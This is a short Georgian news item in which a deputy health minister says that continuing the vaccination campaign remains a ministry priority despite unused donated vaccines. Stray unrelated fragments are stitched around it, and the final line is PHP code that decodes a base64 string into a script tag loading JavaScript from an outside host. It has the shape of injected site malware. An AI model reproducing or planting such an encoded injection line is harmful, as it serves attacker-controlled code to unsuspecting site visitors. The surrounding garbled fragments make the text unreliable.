celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის მოადგილის განცხადებით, ვაქცინაციის კამპანიის გაგრძელება ჯანდაცვის სამინისტროსთვის პრიორიტეტულია. ამის შესახებ მან C ჰეპატიტის ელიმინაციის პროგრამის პრეზენტაციაზე ჟურნალისტების კითხვის საპასუხოდ განაცხადა.
 
„ვაქცინაციის პროგრამა ჩვენთვის პრიორიტეტული რჩება. სამწუხაროდ, ვაქცინების გარკვეული რაოდენობა აუთვისებელი დარჩა. ეს ვაქცინები ქვეყანამ შედარებით მოგვიანებით დონაციის გზით მიიღო და ჩვენთვის ამ პირობებში დაგეგმვა შედარებით რთული იყო, რადგან მოლოდინი და მოთხოვნა პირველ ეტაპზე ძალიან მაღალი იყო, ხოლო შემდეგ შემცირდა, მაგრამ ეს არ ნიშნავს იმას, რომ მიმდინარე პერიოდში სამინისტრო ვაქცინაციის კამპანიის გავრცელებაზე მუშაობას არ გააგრძელებს. აუცილებელია, რომ ვაქცინაციის პრიორიტეტულობა კიდევ ერთხელ ხაზგასმით გაჟღერდეს და გაზიარდეს.
 
ვაქცინაციის კამპანიის გაგრძელება სამინისტროსთვის პრიორიტეტულია“, - განაცხადა თამარ გაბუნიამ.
792
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");